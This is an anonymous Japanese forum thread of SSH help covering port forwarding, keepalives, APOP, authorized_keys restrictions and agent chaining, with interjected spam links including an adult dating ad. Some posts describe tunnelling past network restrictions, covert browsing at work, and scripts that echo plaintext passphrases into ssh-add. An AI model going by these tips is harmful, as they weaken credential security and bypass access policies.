> 激しく当たり前だったらごめんなさい。回線切って首吊ってきます。

つーこって、吊るこたぁないが、なにか間違ってたのもたしかなんだ
ろうなぁ、きっと。

くそ厨房質問で申し訳ないのですが…

client---<ssh可能>---hostA
hostA---<大体のポートが開いている>---www
といった構成で、clientからhostAにsshかけて外部へパケットを飛ばすことを考えています。
localhostのポートをhostAのポートにフォワーディングすればいいのかな？
と思って、とりあえず8080を80に、とかやってみたんですけど、
転送要求が拒否されたとか言われました。
これは、考えが間違っているんでしょうか、それともhostAの方で塞がれているんでしょうか？
アドバイスお願いいたします。

>>515
もっと具体的に書け。

細かいhost名とかは晒せませんが…
とりあえずteratermproで実験してみました。
ssh転送で、localhostの8080をhostAの80に飛ばして、
IEのproxyでlocalhost:8080をproxyに指定。…だめでした。（転送要求が拒否されたと出る。）
といったかんじなのですが。

#普段mozillaしか使っていないので嫌われたか？（ぉぃ

hostA:80 では何が動いてるのですか?

>>517
そりゃそうだろ。hostA:80にproxyとしての要求を出しているんだから。

>>518
何といわれても…デーモンとかのことですか？

>>519
あ、やっぱりですか。でも、今ひとつ何をすればいいのかわからんのです。

むぅ…はぁ〜さっぱりさっぱり。

>>515
目的は何なのよ。

>>515

hostA で delegate とか動かす必要があるのでは？

client% ssh hostA -L 8080:www:80
して、ブラウザ側で
http://localhost:8080/
かな。

ん、TeraTermか。
hostAにログインしておいて"SSH Port Forwarding"のところで、
　Forward local port: [8080]
　to remote machine: [www] port: [80]
これでどーよ。

質問していながら申し訳ありません、
これからIPunreachableな田舎へ引っ込むため、
年明けにでももう一度考え直してみます。
返信ありがとうございました。

cliantからhostにsshで入って、terminalにコマンドをしばらく
打たないでいると、自然に接続が切れるのですが、どうすれば、
切れないようにできるのでしょうか？

>>526
> cliantからhostにsshで入って、terminalにコマンドをしばらく
> 打たないでいると、自然に接続が切れるのですが、どうすれば、
> 切れないようにできるのでしょうか？

・たぶん間に挟まってる NAT/NAPT 機器の変換表保持時間を長くする。
・sshd_config で ClientAliveInterval を適当な時間に設定 (ただし
　SSH2 Only)

のどっちか。

sshdに空パケット投げるパッチ当ててみたら？

X11 forwarding って何すか?
slogin して X client を立ちあげるのとは違うんですか?

>>527, >>528
ありがとうございます。SUN sshがhostなんで、
ClientAliveIntervalが設定できないみたいです。
でも、勉強になりました・・。OpenSSHにするという手もありますね。

>>529

簡単に言うと、port forward + X認証　ってとこじゃなったかな？多分。

>>530
> ClientAliveIntervalが設定できないみたいです。

sshd に依存しない (けどすんごい野蛮な) 手として

while true; do
echo -n .
sleep 180
done &

とかいうのを login した先で走らせとく、なんてのもある。

♯これなら SSH1 でも動くから、SSH2 に移行して ClientAliveInterval
♯を知るまでは実際に使ってたことも。

>>531
解説ありがとう。
しかし勉強不足のせいで何のことだか
わかりませんでした。勉強します。
スマソ。

ssh の port forwarding で pop に接続するということは、
その pop server に sshd がインストールされていることを
前提にしている訳ですよね。
自宅サーバとか学校のサーバではない、
普通の商用プロバイダでも sshd は
用意されているものなんでしょうか。

ちなみに私は biglobe です。
実際に試してみようかとも思ったんですけど、
port scan と間違われるといけないので。

>>534
普通は無い。

ssh使いたいってことは途中の経路でパスワードや内容を見られたくないってことかな？
パスワードの暗号化にはAPOPがあるし、内容の暗号化にはPGPがある。

PCとプロバイダのメールサーバとの間でsniffされる可能性は低いと考えると、
メールソフトがPGPに対応していればとりあえず安心できるのかも。

うーむ、やっぱ普通はないですよね。
パスワードたれ流しは仕方なしか。

>>536
多少スレ違いですが、 apop の暗号は強固なものなんでしょうか。

>>538
正確に言うと、APOPはパスワードを暗号化するっーより
md5でパスワードのハッシュ(指紋みたいなもの)を取ってそれを合わせてる。
だからパスそのものは流してはいない。

ちなみに、SSHの認証鍵方式もハッシュを流してたんじゃなかったけか？

APOPはオートだけどPGPはオートとまでは行かず、めんどくさい。

pop3s(port 995)ってはやってないのかな......

>>540 そんなことないです。

>>539
> 正確に言うと、APOPはパスワードを暗号化するっーより
> md5でパスワードのハッシュ(指紋みたいなもの)を取ってそれを合わせてる。

『正確に言うと』と書くんなら本当に正確に書かんと。本当にパスワー
ド＊のみ＊のハッシュを取ってるだけなら容易に replay できちゃう
からまったく意味なし。

で、強度という点では、大概はパスワードに引きずられるから、まぁ
よくて 30〜40bit のエントロピーってとこかしら。辞書攻撃できるよ
うなパスワード使ってたら challenge&response のサンプル数個です
ぐに破れちゃうだろうね。

> ちなみに、SSHの認証鍵方式もハッシュを流してたんじゃなかったけか？

SSH1 の RSA 認証ならたしかにハッシュを使っているけど (この辺り
に関しては前スレに解説あり)、SSH2 の公開鍵認証は全然違う。

java SSH2 terminal emulater だって。
http://wiredx.net/jcterm/

ttps://www.netsecurity.ne.jp/article/2/8164.html
(((；ﾟДﾟ)))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

　T　h　e　o　必　死　だ　な　（藁

MICKEY MOUSE HACKING SQUADRON って誰なんだ?

Windows2000 → FreeBSD4.7R で ssh を使って接続しています。
ところが、最近表示が詰まるようになってしまいました。
画面の上から 10 行目あたりで一度止まって残りが表示される感じです。
(ちょっと昔に ssh 対応 の TeraTerm3 が発表され、この板の住人で
使った人が"なんか表示が詰まらない？" のような感じに表示がなります。)

何が原因なのか

Putty ssh
Putty telnet
TeraTerm (telnet)
ttssh (ssh)

でそれぞれ接続してみたところ、 ssh で接続した時にこの現象が出るようです。
最近、 ssh 関係の設定もハードウェアも変えていません。ロードアベレージも
限りなく 0.00 に近いです。
何か心辺りがある方は御一報下さい。

sshd version OpenSSH_3.4p1 FreeBSD-20020702

>>548
Compression no とか？

OpenSSHにセキュリティホールがあったという事件で、
SSH系は、すっかり信用を落としてしまいましたね。
もっと単純明快なソフトの書き方にしないかぎり、
これもまた常にもうひとつバグがあるの繰り返しかな。
SSHのバグはこればかりじゃなくて過去にも何度も
出ています。

それにしても、そろそろUNIXに最初から裸のTELNETとか
FTPとかR系コマンドとかSENDMAILが入らなくなって
しかるべきで、これらのコマンドはあっても必ず、
マシン外部から出て行くときにはパケットが暗号化
されるようにはやくなりませんかな。

telnetは問題ないだろ。つーか、無くなると手でポート叩く時に困る。

典型的なFUDですな。

>550はFUD
550はDQN

（´-`）.｡oO（>>550にSENDMAILが入っているのはなんでだろ？）

>>550
どこからのコピペ？

>>549
Compression no
を/etc/ssh/sshd に追加後、kill -HUP sshd　して再接続しましたが変化ありませんでした。

NIC の Driver 入れ直したら改善して模様。

ssh のポートフォワードの機能だけを使わせたい素人の友人がいるのですが、怖いのでシェルは使わせたくありません。
どうでもいい　IDをつくってログインシェルに
ssh -R port:host:hostport #ssh のポートフォワードの自動実行
alias *=exit #　何かキーを押したらログアウト

見たいな記述をしておけば、IDとパスワードを教えても大丈夫でしょうか？　というよりこの状態でイタズラできる方法ありますかねぇ？

>>558 も素人。

>>558
ログインシェル変えればいいじゃん。

>560
alias で　* とかなってんじゃないの？

>558
サーバー側でポートフォワードを許す設定になっているなら putty とかでログイン時にイタズラできない？　
ftp とか netbiosとか sambaにポートフォワードする設定にしてログイン。　その後　samba にアクセスとか。
てーかSSHがあれば対象のIPさえわかれば　LAN内のどこにでもポートフォワードでアクセスできると思われ。

ログインできないようにしてpermitopenを使えばよろしいね。

＞561　>562
なるほど。　そんなこともできるんですね。　怖い怖い。
とりあえず試してみたのですけど alias の記述で * は認めないみたいなのでどうしたもんだろって感じです。
PATH を何にも通さなくして ~/　にexit だけを置いてみたんですけどやっぱり誰かが /bin/ とか絶対番地入力に気がつくだろうなぁ・・・

「番地」って、、、(;´Д｀)

>>562
no-x11-forwarding,no-agent-forwarding,no-pty あたりもあったほうがよいでしょうか?

>>563
ぜんぜんわかってないご様子ね。やめたほうがいいっす。
今までのことはすべて忘れて windows を使っててください。

>>565
-NをつけてればagentもXも転送されないので、とくにつける必要ないです。
ログインできなければptyも関係ないし。

>562
わかってないけど忘れるのは無理。
とりあえずもっと勉強してきます。

>>567
stunnel の方がいいんでないのかい

zebedee






と言ってみるテスト

（＾＾）

authorized_keysでcommadn="command"の制限をしたいとき，
実行したいコマンドが複数ある場合どうすんの？

# dump -0 -a -f - /home | ssh -l user server "cat | gzip -c > /path/home.gz"
# dump -0 -a -f - /usr | ssh -l user server "cat | gzip -c > /path/usr.gz"
とかいうのをしたいのよね。

>571
暗号化せず、日本語で書いてください

>>572
> >571
> 暗号化せず、日本語で書いてください

意味不明。
日本語を書くこと。

>>573
なんだコイツ、日本語で書けよな。

572　はネタのつもりだったんじゃない？　一応暗号化関連のスレだし。

上の方にでていたTeraTerm のSSH2対応版を使っているのですがポートフォワードができなくて困ってしまいますた。
で、TTSSHだとできるのに・・・　誰かできた方はいますか？

ねぎマンセー！！ねぎマンセー！！ねぎマンセー！！ねぎマンセー！！ねぎマンセー！！
ねぎマンセー！！ねぎマンセー！！ねぎマンセー！！ねぎマンセー！！ねぎマンセー！！
ねぎマンセー！！ねぎマンセー！！ねぎマンセー！！ねぎマンセー！！ねぎマンセー！！

解読できません。

>>571
> authorized_keysでcommadn="command"の制限をしたいとき，
> 実行したいコマンドが複数ある場合どうすんの？

実行したいコマンド毎に別の鍵ペア用意して -i で使い分ければ？

windows機でsshサーバをたちあげようとする時、現状では
cygwinしか選択肢は無いのでしょうか？
ぐぐってみても、windows用はクライアントしか引っかからない…

>>580
ssh.com にはないの?

http://www.agemasukudasai.com/bloom/

>>580
有料のとかあったはず

どうもありがとうございます
>>581
>>583
すみません、できれば無料のを探しているのです…
ssh.comのは評価版なんですよね？むむむ…
おとなしくcygwinを入れた方が良いのかな?
Diskがやばいのでなるべく小さなのを入れたかったのですが…
もう少し探して見ます。どうもありがとうございました。

>>579
ども。その手があったか。

>>584
cygwin sshdの解説はここがわかりやすい。ここ見れば一発だ。
http://osksn2.hep.sci.osaka-u.ac.jp/~naga/miscellaneous/winssha.html

>>586
そのサイト、あちこちに気になる記述が。

515的な発想なんだけど、
client---<ssh可能>---hostA
hostA---<大体のポートが開いている>---www（不特定のHOST)
の場合、つまりポートフォアーディングでウェブを参照したいとき、
やはり、proxyを経由じゃないとだめなんでしょうか？

wwwが特定のHOSTの場合は参照できることを確認済みです。
動的に転送先を変えるみたいなことはやはり不可能？

もうひとつ質問させてください。
client---<sshのみ可能>---hostA ---<sshのみ可能>---hostB
のときhostBにポートフォアーディングしたときは
hostAでclientのポート22をhostBに転送し、clientにsshする。
（実際はhostBにsshすることになる）
その後、clientの任意のportをポートフォアードする。
これで一応可能みたいなんだけど、これって問題ない？

>>588-589
？？
要点を整理して書き直してください。

上にあるように
client% ssh hostA -L 8080:www:80
して、ブラウザ側で
http://localhost:8080/
で特定のHOSTはOKなのですが、これを不特定にしたい。
つまりwwwを動的に書き換えたい。
普通に考えれば
client% ssh hostA -L 8080:proxy:8080
としてブラウザのプロキシをproxy:8080にすれば可能だと思います。
proxyサーバ経由しない方法ってないですか？
やっぱり無理ですよね？

client% ssh hostA -L 23:hostB:23
とした後、
client% ssh localhost
でログインし
hostB%ssh localhost -L port:hostX:port
とします。
するとclientの任意のportをhostXに転送できるのです。
これ問題ない？

http://www6.ocn.ne.jp/~endou/index2.html
　　　　　★YAHOOOプロフィール★

>>592 できない。

>>591
そのままでは無理です。
hostAにsquid等のhttp proxyを立てられる権限を持っているなら、
proxyがlistenしているポートをclient側にforwardして、
clientのブラウザでforwardされたlocalhost:<port>をproxyとして指定すれば可能と思われます。

sshのみでhttpの接続先ホストを動的に変えるのはほぼ無理です。
どうやってhttpの接続先アドレスをhostAに渡すのか考えてください。


>>592
やはり意味不明です。
もう一度よく考えて書き直してください。

>>595
591はproxy:8080をlocalhost:8080と間違えてかいてました。
　おっしゃるとおりにできることは確認ずみ。
　無理だと思うからあえて聞いてみたいんですけど。。
　動的にまではいかなくても、簡単に書き換えられるスクリプトでもあるかなと思って。。


　592は要するに2段先ののGWへポートフォワーディングしたいんですよ。
　もちろん、途中はsshしか許可されてない。
　ちなみにwinなひとなんで、592の表現は誤っていたかかも。
　こちらもできることは確認済み。
　ですが、セキュリティ的に問題あるかもとおもって確認してます。
　
　

>>596
だいたい分かりました。
問題あるか無いかは管理方針によります。
もし危険だと思うならばport forwardを不許可にすべきでしょう。

あと -R オプションというのもあるので、そちらも man で読んでみてください。

>>592は　23じゃなくて、22でSSHのポートの誤りです。
てか、TTSSHから想像で書いたので、後から見直すと間違ってる。。

>>597
ssh(22)をポートフォアーディングすることの危険性ってどういうことが
考えられます？
そりゃー、port forwardを不許可にすることが一番簡単なんですけど。。

-R　をどういう意図で出してきたのかわかりませんが、
リモート側でLISTENするのどういうときに使われるんでしょうね。
結構こわいですよね？

.:*・:*・∵.☆:* ・∵.゜.☆.・∴.,★ :*・∵.:☆.。.:*・:* ・∵.+:*・∵.゜ ">*・.:.。.:*・:*・

∵.☆:*・∵.゜.☆.・∴.,★ :*・∵.:☆.。.:*・:* ・∵.+:*・∵.゜ ★
★http://www6.ocn.ne.jp/~endou/index2.html★
　　　　　　★こんなサイト見つけました★

.:*・:*・∵.☆:* ・∵.゜.☆.・∴.,★ :*・∵.:☆.。.:*・:* ・∵.+:*・∵.゜ ">*・.:.。.:*・:*・

∵.☆:*・∵.゜.☆.・∴.,★ :*・∵.:☆.。.:*・:* ・∵.+:*・∵.゜ ★
★http://www.momonga-linux.org/docs/OpenSSH-HOWTO/ja/index.html★
　　　　　　★こんなサイト見つけました★

マジネタ。わかりやすくできてる。

>>601
> マジネタ。わかりやすくできてる。

ホントだ。
でも、そのスタイルで書かれると疑うよ。(W

一応正確にかくと
client% ssh hostA -L 22:hostB:22
の後、
client% ssh localhost -L port:hostX:port
です。
もちろん、clientではsshdは起動してません。
こうするとhostBからしかアクセスできないhostXの任意のポートに
clientからアクセスできます。

>>588
テケトーな荒業だけど、
www.google.co.jpあたりにフォワードして
google様のキャッシュを利用すればたいていのページは見れますよ

>603
二重に暗号化される箇所があるけど、速度面以外は問題が無い。

A営業所とB営業所の間をインターネット経由で結んで、
A営業所にあるLANにB営業所のLANがあたかも直接スイッチハブで
つながっている一つのLANであるかのようにネットワークを構築
したいのだけど、どうやればいいの? インターネットを通すので、
暗号化を加えるのにSSHを使いたいのだけど、A営業所とB営業所
の間のルーティング情報とか任意のプロトコルのパケットが
相互に通信できないと困るんですけども。

>>606
http://www.google.com/search?lr=lang_ja&ie=eucjp&q=SSH+VPN+%B9%BD%C3%DB

VPN 張りたいなら SSH にこだわる必要もないと思うが。

トンネル通ったパケットの送信元アドレスを変えることってできない？
送信元がダイナミックに振られるppp0のアドレスになるから、アクセス制御が大変で。。。

>>609
-b

$ssh -L8080:host-a:8080 -b 192.168.0.1 host-a
bind: 192.168.0.1: Cannot assign requested address

とか言ってできない

>>611
あぁ、トンネルの向こう側か。 man 眺めた限りだとちょっとわかんないや。ｽﾏｿ

keychainの--clearオプションの使い方がいまいち分かりません。

あまりログインしない鯖上で、rsync -e sshをcronで回すことを想定しているんですけども、
ttp://www-6.ibm.com/jp/developerworks/linux/011130/j_l-keyc2.htmlによると
こういった場合、--clearを使うとなにか効用があるような感じなんですが、具体的には
どうすればいいんでしょうか。

sshd は inetd 経由でなくても
hosts.allow, hosts.deny を参照するようですが、
普通これらのファイルは inetd 用であるという認識であってますか?

>>614
いいえ。 libwrap (tcpwrappers) 用です。 OpenSSH はデフォルトでリンクしてます。
inetd も、libwrap をリンクしていなければ /etc/hosts.* を見ませんよ。

>>615
なるほど。勉強になりました。
ありがとうございます。

>>613
> keychainの--clearオプションの使い方がいまいち分かりません。

過去スレ (http://pc.2ch.net/unix/kako/976/976497035.html) の
693 においらの理解は書いといたけど、あんな程度のもんじゃなかろ
か。

だもんで、command= で利用制限した passphrase なし秘密鍵使う方が
マシだと思う。

過去スレを読むのを怠っていました。どうもすいません。

--clearの効用、よく理解できました。
使い方が分からず、何時間か悩んでいたんですが、いざ分かってみると、
かなり拍子抜けしました。
# もっと「すごい」機能を想像していたんですが。

> だもんで、command= で利用制限した passphrase なし秘密鍵使う方が
> マシだと思う。

そのようですね。こちらの方法で試してみたいと思います。

ssh -o monster

WinSCP 2.2、βが取れたみたいだから入れてみたけど、めっちゃ重いね。

素直にsftp使うよろし

tera termは偉大なり。
だれか、ＴＴＳＳＨに代わるものつくってちょ！

>>622

PuTTY じゃなんでダメなの?

putty っていやらしくない?
tty ですでにいやらしいけど。

いやらしくないのがいいんですか?

パテのどこがいやらいいんだ?

ぷっちぃ

ピア=マルコ




なつかすぃ〜(藁

TeraTerm のマクロが結構あんのよ

TeraTermでローカルのCygWin/sshdにログイン。
そっから好きなとこいけ。

>>630
ローカルへ、のときにssh使う意義って何？

自動化が楽。

てらりん☆あげ

ホストが３つあって
ローカルホストＡにはＡで生成した秘密鍵が。
リモートホストＢにはＡの公開鍵とＢで生成した秘密鍵が。
リモートホストＣにはＢの公開鍵が置いてあるがＡの公開鍵はない。
Ａの秘密鍵とＢの秘密鍵のパスフレーズは同じ。

こういうときにパスフレーズを一回しか打たずにＣに入る方法（あるいはソフト）ってありますか？
rootナシで動くソフトならBにインストールしておけるという条件で。

もしよい方法がありましたら教えてください。お願いします。

あるわけないでしょ。鍵が違うんだから。

>>634
2段階のログインがいやなら
ssh Ｂ ssh Ｃ
でどうよ。
パスフレーズは2回打たなきゃいけないけど
コマンド1つで済む。
試してないけど。

■■わりきり学園■■

コギャルから熟女まで

素敵な出会い

ゲイ、レズビアンなどコンテンツ豊富

http://www.geocities.jp/kgy919/deai.html

うーむ。ダメですか。
エージェントみたいなのにパスフレーズを記憶させて、
パスフレーズの入力時に勝手に送信してくれるようなソフトはないですかね。
空パスフレーズよりは少し堅いかと思ったのですが。

>>636
ssh -t B ssh C
ならできました。けど、やはりこれを省略したい……。

>>634
ホストＣにＡの公開鍵をおけば？

>>634
>>639
ほんで、エージェントフォワードを認めればよい

>>639,640
いや、エージェントフォワードもポートフォワードもしない方法を探していたんですよ。
まぁ、なさそうなので諦めます。

>634
パスフレーズ無しの鍵を利用する

上5行とは矛盾しないが、

>>634
ホストB の ~/.ssh/authorized_keys に
no-X11-forwarding,no-agent-forwarding,command="/path/ssh ホストC" ホストAの公開鍵
って書けば。
ホストA で，
ssh ホストB
とすると自動的に(ry

追加。
そういや no-port-forwarding オプションもあった。

RHL8.0 入れたら RHN7.3 からの slogin がエラーが出て繋がらなくなりますた
サーバで素で入れたまんま。ファイアーウォールはお互い張っていません。

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the RSA host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
cb:9b:76:69:30:0f:96:68:d1:7d:17:a6:3d:54:79:31.
Please contact your system administrator.
Add correct host key in /root/.ssh/known_hosts to get rid of this message.
Offending key in /root/.ssh/known_hosts:3
RSA host key for 192.168.160.251 has changed and you have requested strict check
ing.
Host key verification failed.

見たとおり、相手方のサーバ鍵が変わっている、成りすましの可能性もあるから
確認せよってこった。

>>645
正常な動作だと思いますが。

するとサーバ鍵を再生成すれば良いんでしょうか・・・？
ってか初めての接続で怒られてる・・・あ、再インストで同ＩＰ使ってる・・・
それが原因でしょうか。ってことは認証をもう一回張り直せばＯＫ？

つーか、ssh の動作をぜんぜんわかってないみたい。
telnet でも使えば?

>>648
黙って英文読めって。
読めなかったら、その英文の一部をぐぐれ。

>>634
ホストAとホストBのsshがSSH Secure Shellなら、パスフレーズがある場合でも

eval `ssh-agent`
echo PASSPHRASE | ssh-add -p
ssh -t B "eval \`ssh-agent\`;echo PASSPHRASE | ssh-add -p;ssh C"

みたいなのをスクリプトに書いてPASSPHRASEの部分を一度だけ入力させるようにすれば、実現できる。

OpenSSHだとssh-addに-pオプションはないみたいですが、
どうしてないんでしょう？　危険なんでしょうか？　＞詳しい方々

>648
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ なんのために強調してると思ってるんですか？ @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

I have something wrong with >>652.
I just executed it, but it does't work well.
What should I do?

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ なんのために強調してると思ってるんですか？ @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

呪われた虐 (ry

警告: リモートホストの同一証明は変わった!
誰かが厄介な何かをしていることは可能である!
誰かはあなたで今盗み聞きできる( 人中間の攻撃)!
RSA のホストのキーがちょうど変わったことは可能またである。
RSA のための指紋はリモートホストによって送られてである
cb:9b:76:69:30:0f:96:68:d1:7d:17:a6:3d:54:79:31
調整する。あなたのシステム管理責任者に連絡しなさい。
このメッセージを取り払うために正しいホストのキーのの
/ root/.ssh/known_hosts 加えなさい。
192.168.160.251 のためのおこる主で
/ root/.ssh/known_hosts:3
RSA ホストのキーは変わり, あなたは厳密な点検を要求した。
ホストの主証明は失敗した

http://babelfish.altavista.com/

みんなやさしいね。

>>651
> OpenSSHだとssh-addに-pオプションはないみたいですが、
> どうしてないんでしょう？　危険なんでしょうか？

まぁ、$SH のやつが実装しているというなら、直接的なセキュリティ
ホールってことはないんでしょうが。気になるとすれば、こういう機
能を付けてしまうと passphrase を直にベタ書きした script の類が
書きやすくなってしまうかも、って程度かしら。

-p なしでも、expect とか使えば似たよなことはできちゃうので必要
を認めずってことかもしれないし。

>>648
コンサル(ry

スレ違いsage

-fでバックグランドジョブを投入すると標準入出力が/dev/nullにリダイレクトされてしまうけど、
これを避ける方法はありますか?

やりたいこと:
マシンB,C間でsshで接続したバックグランドジョブを動かしたい。
ssh-agentはマシンAで動かし、マシンAからsshでマシンBにコマンド(B,C間のsshジョブ)を投入する。
マシンBで起動するコマンドをnohup ssh C ..... &などとすると、このsshがssh-agentから秘密鍵
を読む前に、マシンAで最初に投入したsshが終了してしまい認証できない。
今はnohup ssh C...&したあとに適当な時間sleepしてるけど、これはダサい。

すみません、ちょっと挫折しかけてるので質問します。
host-A:25----host-B:25----host-C:25
というふうに２重にssh-portfowardingして実質的に
host-A:25----host-C:25
にするにはどのようにすればいいのでしょう？
host-B(Linux)の~/.ssh/authorized_keysの鍵の頭に
command="ssh host-C"とか書いて、host-A(windows)のPortforwarderで
チャレンジしましたけどhost-Cまでたどり着けませんでした。
もちろんhost-Aからhost-B、host-Bからhost-Cにsshが通るのは確認済みです。
sshの偉い方、よろしくお願いします。

そろそろTeraTermがSSH2に対応しそうです。

>>661
これのこと？
http://www.ayera.com/teraterm/

SSH2使いたい人はとうの昔にPuTTYに乗り換えたからなぁ。
とはいえ、端末エミュレータとしてはTeraTermのほうが安定性とか
日本語まわりとかで優れている点も多いんで、いまさら無意味という
わけではないけど。

ぐぐってみると、TTSSH2 なんてのを作ってる方がいたみたいだけど、
今はどんな感じなんでしょ？
>>661 さんの言ってるのはそれのことなのかしら？

>663
> 端末エミュレータとしてはTeraTermのほうが安定性とか
> 日本語まわりとかで優れている点も多いんで

そうか？
putty の方が多機能だし日本語処理も「正しく」やっているし (iso-2022 patch の話だが)
マクロはまた別だが

putty ってシリアル端末として使えたっけ？
TeraTerm は ZMODEM over SSH でファイル転送なんて技もできるし。

PuTTY: A Free Win32 Telnet/SSH Client
http://pc.2ch.net/test/read.cgi/unix/1014702733/

くらいあんとのはなしわ

>>661に繋がらないのだが、俺だけ？
直接SSH2を喋れるTeraTermほすぃんだけど...。

間違えた。>>662でつ。

おい、それから言葉使いなんとかしろよ、ハッカー気取りのホウケイ！
初心者の皆さん、（っても僕も６荷月児ですが）上のような馬鹿には気を
つけましょう。この手はいっぱいいます。外人さんの方がいい人多いですよ。

教えてくれ。

質問。
外のマシンにopensshのデーモンをtcpwrapperオプションつきであげてるんだけど、
inetdのhost.allowを動的にコントロールする方法ないかなぁ？
YahooBBなんでsshd: .bbetc.net、つーのもちょっと怖いんで、DDNSみたいな感じで
別んとこからコントロールできたらな、と。（それも怖いけど）

時に2ch対策でYahooBBが希望者の逆引きをybb.ne.jpかなんかにするって話あったよね？
あれの申し込みはどうやるの？

>>672
> inetdのhost.allowを
意味分からん。

つーか、何をキーというかトリガーにしてコントロールしたいん？

漏れなら、SSH なんだからきっと大丈夫やろ、と思ってどっからでも許可にしちゃうが。

この度は息子がわかりづらい質問をして申し訳ありません。
恐らく息子はこう言いたかったのだと思います。

質問があります。

レンタルサーバ上で sshd を inetd 経由で立ち上げるようにしています。

自宅のISPは YahooBB です。自宅のPCのIPアドレスが変わったときに
それを検知して何らかの方法でレンタルサーバ上の /etc/hosts.allow を
書き換えたいと思っています。何かいい方法はないでしょうか？

　sshd: .bbbetc.net

としておくのはちょっと怖い気がします。

以下は略します。

ところで私自身は tcpserver なのですが、同様なことを考えたことがあります。
私の場合はcronで自分(自宅サーバ)のIPアドレスをチェックし、変わっていたら
sshdサーバ宛にメールを送信し、その発信元アドレスを接続制御データベースファイルに
書き出すようにしていました。

ただ自宅サーバをルータ兼用にしていたときは上記でよかったのですが、
ブロードバンドルータを導入したため、自宅サーバからWAN側のアドレスを
調べることができなくなってしまいました。

私のような場合はどうしたらよいのでしょうね？

至らない親子で申し訳ありませんが、何卒よろしくお願いします。

>>674
どこからでもつながるsshdは怖がるのに、IPアドレスをメールで送るのは
平気というのはどういうことかと思います。PGPでも使っていたんですか。

- メールを信じるのであればReceived:ヘッダかメールログを解析して
接続元のグローバルIPアドレスを取得すればいいと思います。でも
この方法だと通信路を盗聴できる第3者にメールをまるごとキャプチャ
されて、その時と同じIPアドレスを取られたときに無意味になりますね。

- 最近のルータはWebインタフェイスがついていると思うので、
CurlみたいなHTTPクライアントを使ってbasic認証を喋らせて
取得IPアドレスを読むようなスクリプトでも組めばいいと思うです。

>>675
ちょっとだけ補足しておきますと、
SMTP over SSL でつないでおりました。
本文などにはIPアドレス自体は記述しておりませんでした。
Received を解析するのはさすがに採用しかねますね。

ルータのWebインタフェースも利用できればいいのですが
内側からしかアクセスできないのです。

publickey 認証のみ許可すればいいだけでわ？

んだな。それに passwd 認証にしても、
ホスト鍵の指紋をつねに紙に書いて覚えておけばいいだけ。

（＾＾）

翻訳してくれてさんきゅ♪さすがかあちゃん。

>675
それだと

間違い。
>675
かあちゃんのゆーとおりレンタルサーバなのでルータは制御できません。

>678
それってどういうこと？

>>681
自宅のIPをDDNSに喰わしてその名前を使ったらドーなの？

門前払いしなければいけない理由はなんだ?

sshdのセキュリティホールが心配。とか?

>>676
| ルータのWebインタフェースも利用できればいいのですが
| 内側からしかアクセスできないのです。

webインタフェイスにアクセスするのはルータの内側のマシン上にある
スクリプトで、そいつがサーバにメールを送るのでいいんでは?
PPTPとかIPSEC(racoon, isakmpd)とかを併用するのではだめなんですか?

>>683
あ、ごめんよ。母は別に sshd だけじゃないのよ。息子はどうか知らんけど。
つーわけで ssh の話じゃないので吊ってくるわ。お先に！＞息子

(´-`).。oO(そのうち「>>672の精子です」とかいうやつも出てくんじゃないかな)

sftpって転送モードの指定ができないんだけど
実際は何モードで転送されてるの？
バイナリモード？

sftp という名前がついているが、実際は scp のラッパーみたいなもの。

openSSHをインストールしようと思っているのですが、
スタンドアロン+TCP Wrappersがいいのか、xinetdから起動か、
どっちがいいのでしょうか？

> sftp という名前がついているが、実際は scp のラッパーみたいなもの。

ssh のラッパーだよ。

>689
tcpserver から起動

>690
> ssh のラッパーだよ。
ssh のモジュールだよ。

>>689
前者

>>634 keychain と .ファイル
てか、keychain 使っている人いない？

>>693
使ってますが、何か?

>694
ごめん。このスレにでてなかったんで... 前のスレで語り尽くされていたのね。
激しく便利。

利便性は安全性の犠牲の上に成り立っている

ところでSSH Secure Shellのssh-keygenに
-pってオプションがあってパスフレーズを引数で入力できるんですが
これって他人にps axとかされると危険じゃないんでしょうか？

ssh-keygenを使うのは最初だけだから多分大丈夫ってことなんですかね？

>>697
漏れ、ちょうど今こんなスクリプト書いてたところだったよ。

system("ssh-keygen -t #{type} -N '' -f #{file}")

パスフレーズが空だから良いけど、ちゃんとした文字列入れるのはコワイね。

>697
利便性は安全性の犠牲の上に成り立っている

どうでもよいが、
> SSH Secure Shell
を見て、頭痛が痛くなった

Terminal Emulator <Guevara>
http://www.routrek.co.jp/product/guevara.html

>>700
イイかも
使ってみまつ

>>699
SSH Secure Shell for Workstations
http://www.ssh.com/products/security/secureshellwks/

>>700
ためしにダウソしてみました。
感想
　起動が重いうえに、Port Forwardingはできないようだ。　これは致命的。
トンネルが掘れないと、会社でｺｿｰﾘ　ネットができないじゃないか（藁

http://www.agemasukudasai.com/bloom/

>>659
> マシンBで起動するコマンドをnohup ssh C ..... &などとすると、このsshがssh-agentから秘密鍵
> を読む前に、マシンAで最初に投入したsshが終了してしまい認証できない。
> 今はnohup ssh C...&したあとに適当な時間sleepしてるけど、これはダサい。

なんか普通にできるんだが。

augustus[259]$ ssh -f caesar "nohup ssh caligula sleep 30 &"
augustus[260]$ ssh caligula ps x | egrep sleep
25475 ?? Is 0:00.01 sleep 30
augustus[261]$

環境の違い？

>>660
> host-A:25----host-B:25----host-C:25
> というふうに２重にssh-portfowardingして実質的に
> host-A:25----host-C:25
> にするにはどのようにすればいいのでしょう？

Portforwarder は持ってないので OpenSSH でしか試してないけど

> host-B(Linux)の~/.ssh/authorized_keysの鍵の頭に
> command="ssh host-C"とか書いて、

という方向性でうまく行くよん (もちろん、port forwarding option
の記述が double quotation の中になきゃダメだけど)。

あらかじめ host-B→Host-C の port forwarding を設立しとく方が簡
単だとは思うけど。

> host-A(windows)のPortforwarderで
> チャレンジしましたけどhost-Cまでたどり着けませんでした。

